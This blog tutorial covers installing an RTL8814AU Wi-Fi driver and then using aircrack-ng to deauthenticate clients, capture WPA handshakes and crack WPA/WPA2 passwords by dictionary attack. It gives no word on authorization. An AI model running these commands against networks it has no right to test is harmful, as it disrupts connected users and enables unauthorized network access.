- Published on
Using Aircrack-ng with RTL8814AU
- Authors
- Name
- Tong
For Kali Linux users who want to hack 2.4/5GHz Wi-Fi. RTL8812AU/21AU and RTL8814AU are the best chipsets.
Here's the wifi dongle I'm going to use: TP-LINK Archer T9UH
Here's the wifi driver I'm going to use: aircrack-ng/rtl8812au
Installing Driver
Plug-in your Wi-Fi dongle. Execute lsusb
.
lsusb
Check if the device ID is supported by the driver
{USB_DEVICE(0x2357, 0x0106), .driver_info = RTL8814A}, /* TP-LINK Archer T9UH */
The ID of TP-LINK Archer T9UH is 2357:0106
.
Clone the project
git clone https://github.com/aircrack-ng/rtl8812au.git
RTL8814AU is newer than RTL8812AU.
Some improvements come with the latest version.
Checkout to the newest git branch.
git checkout v5.6.4.1
The installation is pretty easy. Just use the script.
sudo apt install dkms
sudo ./dkms-install.sh
If you are using ARM CPU such as Raspberry Pi. Change platform in Makefile.
e.g. I'm using RPI 3 B+ with the official Raspbian OS. It's 32 bit.
sed -i 's/CONFIG_PLATFORM_I386_PC = y/CONFIG_PLATFORM_I386_PC = n/g' Makefile
sed -i 's/CONFIG_PLATFORM_ARM_RPI = n/CONFIG_PLATFORM_ARM_RPI = y/g' Makefile
If you are using Kali Linux. You can also install the driver from source.
sudo apt install realtek-rtl88xxau-dkms
Installing Aircrack-ng
(Aircrack-ng is preinstalled in Kali Linux)
sudo apt install aircrack-ng
Here's the official instruction: Installing pre-compiled binaries
If you want to compile it on your own.
The latest stable version is 1.5.2 currently.
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
git checkout 1.5.2
sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
./autogen.sh
make
make install
Monitoring Wi-Fi
Check interfaces
sudo airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 brcmfmac Broadcom 43430
phy1 wlan1 88XXau TP-Link
Kill all possible programs that could interfere with the wireless card.
sudo airmon-ng check kill
Turn wlan1(RTL8814AU) into monitor mode.
sudo airmon-ng start wlan1
OR
sudo iwconfig wlan1 mode Monitor
Then
sudo airodump-ng wlan1
OR indicate the band 'a' to hop 5GHz
sudo airodump-ng wlan1 -b a
Crack WPA/WPA2 Wi-Fi Password
Capture Data
sudo airodump-ng -c 36 –d XX:XX:XX:XX:XX:XX -w hack wlan1
De-authenticate the connected clients with aireplay-ng
-0
means de-auth, 50 means 50 counts.-a
sets Access Point MAC address.-c
sets destination MAC address.
sudo aireplay-ng -0 50 -a XX:XX:XX:XX:XX:XX -c [Client MAC Address] wlan1
You'll get a WPA handshake
Crack password with dictionary-attack
aircrack-ng -b XX:XX:XX:XX:XX:XX hack-01.cap -w /path/to/wordlist
Here is a project on GitHub for dictionary-attack: Probable-Wordlists
Speed up Crack with Airolib-ng
Airolib-ng is an aircrack-ng suite tool designed to store and manage essid and password lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking.
Download Passwords dictionary
Setting up the database
Create SSID list
airolib-ng wpaDatabase --import essid ssidlist.txt
Create Password list
airolib-ng wpaDatabase --import passwd passwords.txt
Clean Database
airolib-ng wpaDatabase --clean all
Create your PMK’s
airolib-ng wpaDatabase --batch
Cracking
aircrack-ng -r wpaDatabase hack-01.cap